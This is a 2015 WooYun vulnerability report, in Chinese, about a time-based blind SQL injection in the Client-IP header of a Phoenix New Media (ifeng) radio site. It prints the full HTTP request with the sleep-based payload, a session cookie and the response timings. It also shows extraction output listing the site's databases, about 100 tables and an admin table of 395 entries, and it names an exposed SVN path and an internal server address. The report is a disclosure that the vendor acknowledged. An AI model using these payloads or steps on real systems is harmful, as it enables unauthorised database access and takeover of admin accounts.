当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099144

漏洞标题:凤凰网某站SQL注射管理员信息泄露

相关厂商:凤凰网

漏洞作者: 紫霞仙子

提交时间:2015-03-02 21:30

修复时间:2015-04-16 21:32

公开时间:2015-04-16 21:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

233

详细说明:

上次已经报过一个类似的注入点。。
检查修复完成后,在对该参数出现的地方都进行检查,不要只修复某一个点。
这次参数换了个地方,问题又来了。

GET /index.php/stat/clickStat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http://diantai.ifeng.com/
Cookie: userkey=fdcd168b895bd5eb513aef6445cdd278; PHPSESSID=vlq4mrh671r4h03dc79mg69gi5
Host: diantai.ifeng.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
通过sleep来判断注入点存在:
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ 响应时间 9.141 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ 响应时间 6.287 s
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ 响应时间 3.292 s
判断为time盲注

漏洞证明:

---
Parameter: Client-IP #2* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"'||(SELECT 'npcl' FROM DUAL WHERE 7055=7055 AND SLEEP(5))||'/
---
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sst
[*] sst_stat
[*] sst_stat2014
[*] test
Database: sst_stat
[100 tables]
+--------------------+
| sst_stat_05 |
| sst_api_stat_00 |
| sst_clickstat_1411 |
| sst_clickstat_1412 |
| sst_stat_00 |
| sst_stat_01 |
| sst_stat_02 |
| sst_stat_03 |
| sst_stat_04 |
| sst_stat_06 |
| sst_stat_07 |
| sst_stat_08 |
| sst_stat_09 |
| sst_stat_10 |
| sst_stat_11 |
| sst_stat_12 |
| sst_stat_14 |
| sst_stat_15 |
| sst_stat_16 |
| sst_stat_17 |
| sst_stat_18 |
| sst_stat_19 |
| sst_stat_20 |
| sst_stat_21 |
| sst_stat_22 |
| sst_stat_23 |
| sst_stat_24 |
| sst_stat_25 |
| sst_stat_26 |
| sst_stat_27 |
| sst_stat_28 |
| sst_stat_29 |
| sst_stat_30 |
| sst_stat_31 |
| sst_stat_32 |
| sst_stat_33 |
| sst_stat_35 |
| sst_stat_36 |
| sst_stat_37 |
| sst_stat_38 |
| sst_stat_39 |
| sst_stat_3A |
| sst_stat_40 |
| sst_stat_41 |
| sst_stat_42 |
| sst_stat_43 |
| sst_stat_44 |
| sst_stat_45 |
| sst_stat_46 |
| sst_stat_47 |
| sst_stat_48 |
| sst_stat_49 |
| sst_stat_50 |
| sst_stat_51 |
| sst_stat_52 |
| sst_stat_53 |
| sst_stat_54 |
| sst_stat_55 |
| sst_stat_56 |
| sst_stat_57 |
| sst_stat_58 |
| sst_stat_59 |
| sst_stat_60 |
| sst_stat_61 |
| sst_stat_62 |
| sst_stat_63 |
| sst_stat_64 |
| sst_stat_65 |
| sst_stat_66 |
| sst_stat_67 |
| sst_stat_68 |
| sst_stat_69 |
| sst_stat_70 |
| sst_stat_71 |
| sst_stat_72 |
| sst_stat_73 |
| sst_stat_74 |
| sst_stat_75 |
| sst_stat_76 |
| sst_stat_77 |
| sst_stat_78 |
| sst_stat_79 |
| sst_stat_80 |
| sst_stat_82 |
| sst_stat_84 |
| sst_stat_85 |
| sst_stat_86 |
| sst_stat_87 |
| sst_stat_88 |
| sst_stat_89 |
| sst_stat_90 |
| sst_stat_91 |
| sst_stat_92 |
| sst_stat_93 |
| sst_stat_94 |
| sst_stat_95 |
| sst_stat_96 |
| sst_stat_97 |
| sst_stat_98 |
| sst_stat_99 |
+--------------------+
管理员信息:
Table: sst_admin
+-----------+---------+
| Table | Entries |
+-----------+---------+
| sst_admin | 395 |
+-----------+---------+
随便找个登陆

QQ图片20150302202853.png

修复方案:

还有一些SVN地址泄露: http://diantai.ifeng.com/web/static/index/built/.svn/entries
发现:svn://220.181.67.140/diantai/web/static/index/built
这次也求20rank!求满足!

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-04 13:35

厂商回复:

非常感谢,我们正在处理。

最新状态:

暂无